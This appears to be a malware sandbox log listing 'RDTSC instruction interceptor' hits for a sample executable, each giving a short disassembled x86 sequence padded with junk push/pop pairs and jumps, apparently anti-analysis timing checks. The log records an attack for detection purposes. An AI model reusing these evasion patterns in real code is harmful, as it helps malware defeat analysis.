Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B880C second address: 14B8839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F04A523AA8Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F04A523AA94h 0x00000012 ja 00007F04A523AA86h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14BBB7D second address: 14BBB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F04A523FCC2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14BBB9A second address: 14BBBB2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04A523AA86h 0x00000008 ja 00007F04A523AA86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 js 00007F04A523AA8Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147A9FE second address: 147AA02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147AA02 second address: 147AA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147AA10 second address: 147AA16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147AA16 second address: 12C1C11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F04A523AA88h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov cl, 1Eh 0x00000026 push dword ptr [ebp+122D09D9h] 0x0000002c mov dword ptr [ebp+122D1BB1h], eax 0x00000032 call dword ptr [ebp+122D1AF1h] 0x00000038 pushad 0x00000039 jmp 00007F04A523AA98h 0x0000003e add dword ptr [ebp+122D28E7h], edi 0x00000044 xor eax, eax 0x00000046 jns 00007F04A523AA9Fh 0x0000004c mov edx, dword ptr [esp+28h] 0x00000050 stc 0x00000051 mov dword ptr [ebp+122D397Fh], eax 0x00000057 stc 0x00000058 mov esi, 0000003Ch 0x0000005d mov dword ptr [ebp+122D28E7h], esi 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 clc 0x00000068 lodsw 0x0000006a or dword ptr [ebp+122D28E7h], esi 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 jmp 00007F04A523AA97h 0x00000079 jmp 00007F04A523AA96h 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 sub dword ptr [ebp+122D28E7h], esi 0x00000088 nop 0x00000089 jnc 00007F04A523AA8Eh 0x0000008f push eax 0x00000090 ja 00007F04A523AA92h 0x00000096 jne 00007F04A523AA8Ch 0x0000009c push eax 0x0000009d push edx 0x0000009e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147ACBD second address: 147ACC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F04A523FCB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147ACC7 second address: 147ACF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F04A523AA8Eh 0x0000000f je 00007F04A523AA88h 0x00000015 pushad 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 mov edi, dword ptr [ebp+122D39A7h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jc 00007F04A523AA88h 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147AE09 second address: 147AE13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F04A523FCB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B014 second address: 147B01E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B01E second address: 147B097 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F04A523FCB6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F04A523FCB8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jne 00007F04A523FCCCh 0x0000002d jmp 00007F04A523FCC0h 0x00000032 push 00000004h 0x00000034 or dword ptr [ebp+122D3413h], edi 0x0000003a nop 0x0000003b jbe 00007F04A523FCBCh 0x00000041 pushad 0x00000042 push ecx 0x00000043 pop ecx 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B097 second address: 147B0A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B3AC second address: 147B3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B3B0 second address: 147B3BA instructions: 0x00000000 rdtsc 0x00000002 je 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B3BA second address: 147B3D9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F04A523FCBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F04A523FCBCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B3D9 second address: 147B44B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F04A523AA97h 0x00000008 jmp 00007F04A523AA93h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 or edi, dword ptr [ebp+12459F8Dh] 0x00000017 push 0000001Eh 0x00000019 mov cx, di 0x0000001c nop 0x0000001d pushad 0x0000001e jmp 00007F04A523AA95h 0x00000023 jmp 00007F04A523AA98h 0x00000028 popad 0x00000029 push eax 0x0000002a push esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B44B second address: 147B44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B44F second address: 147B453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B543 second address: 147B547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B547 second address: 147B55B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B55B second address: 147B561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B561 second address: 147B565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B71E second address: 147B722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B722 second address: 147B72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B7FA second address: 147B84F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc edi, 169B87ABh 0x00000012 lea eax, dword ptr [ebp+1248C33Fh] 0x00000018 sub cl, FFFFFFA0h 0x0000001b nop 0x0000001c push edi 0x0000001d jmp 00007F04A523FCC1h 0x00000022 pop edi 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F04A523FCC3h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B84F second address: 1462709 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F04A523AA93h 0x00000010 jmp 00007F04A523AA8Dh 0x00000015 popad 0x00000016 nop 0x00000017 movzx edi, cx 0x0000001a lea eax, dword ptr [ebp+1248C2FBh] 0x00000020 movsx edx, dx 0x00000023 xor dx, F1AAh 0x00000028 push eax 0x00000029 je 00007F04A523AA92h 0x0000002f jmp 00007F04A523AA8Ch 0x00000034 mov dword ptr [esp], eax 0x00000037 mov edi, dword ptr [ebp+122D3AB7h] 0x0000003d call dword ptr [ebp+122D2910h] 0x00000043 pushad 0x00000044 jmp 00007F04A523AA90h 0x00000049 pushad 0x0000004a jmp 00007F04A523AA8Bh 0x0000004f jmp 00007F04A523AA95h 0x00000054 popad 0x00000055 jbe 00007F04A523AAA5h 0x0000005b jmp 00007F04A523AA99h 0x00000060 jnl 00007F04A523AA86h 0x00000066 popad 0x00000067 push eax 0x00000068 push edx 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14BBFEC second address: 14BBFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14BBFF5 second address: 14BBFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F04A523AA86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14BBFFF second address: 14BC020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBAh 0x00000007 jo 00007F04A523FCB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14BC020 second address: 14BC026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14BC026 second address: 14BC02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14BC02A second address: 14BC032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14BC700 second address: 14BC704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14BC704 second address: 14BC708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1446249 second address: 144624D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144624D second address: 1446257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1446257 second address: 144625B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144625B second address: 144628C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA94h 0x00000007 jmp 00007F04A523AA99h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144628C second address: 14462A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCC0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1438AB8 second address: 1438ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1438ABE second address: 1438AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14C357D second address: 14C3584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14C3584 second address: 14C3590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F04A523FCB6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14C3590 second address: 14C35A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Ch 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14C38E2 second address: 14C38EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F04A523FCB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14C3A6B second address: 14C3A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CB1BF second address: 14CB1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CB1C8 second address: 14CB1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CB1CE second address: 14CB1D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CB1D7 second address: 14CB1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CB1E0 second address: 14CB1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F04A523FCB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CB4B7 second address: 14CB4BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CB63E second address: 14CB642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CB642 second address: 14CB648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B1D9 second address: 147B237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F04A523FCC6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jnc 00007F04A523FCBCh 0x00000014 mov ebx, dword ptr [ebp+1248C33Ah] 0x0000001a add eax, ebx 0x0000001c mov edi, ebx 0x0000001e nop 0x0000001f jmp 00007F04A523FCC4h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007F04A523FCC1h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B237 second address: 147B27B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F04A523AA8Ch 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D28BFh], ebx 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F04A523AA88h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e clc 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jbe 00007F04A523AA88h 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B27B second address: 147B2B5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04A523FCCBh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F04A523FCC4h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B3C4 second address: 147B3D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F04A523AA8Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CFA68 second address: 14CFA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CFBDD second address: 14CFBE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CFBE1 second address: 14CFBF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F04A523FCB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007F04A523FCB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3D57 second address: 14D3D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3D5B second address: 14D3D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F04A523FCBBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3D6E second address: 14D3D73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3D73 second address: 14D3D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F04A523FCBEh 0x00000010 jbe 00007F04A523FCB6h 0x00000016 pushad 0x00000017 popad 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D32AA second address: 14D32AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D32AF second address: 14D32C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCC5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3717 second address: 14D3723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F04A523AA86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3723 second address: 14D376F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F04A523FCC6h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F04A523FCC6h 0x00000014 popad 0x00000015 jc 00007F04A523FCB8h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d popad 0x0000001e pushad 0x0000001f push ebx 0x00000020 pushad 0x00000021 popad 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pop ebx 0x00000025 push ebx 0x00000026 push esi 0x00000027 pop esi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D8F21 second address: 14D8F2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D8F2A second address: 14D8F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D8F30 second address: 14D8F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edi 0x0000000a jng 00007F04A523AA86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D906F second address: 14D9087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523FCC2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D9087 second address: 14D908D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D9680 second address: 14D9684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D9684 second address: 14D9688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D9688 second address: 14D969D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523FCBBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA145 second address: 14DA149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA149 second address: 14DA151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA151 second address: 14DA161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F04A523AA86h 0x0000000a jbe 00007F04A523AA86h 0x00000010 rdtsc
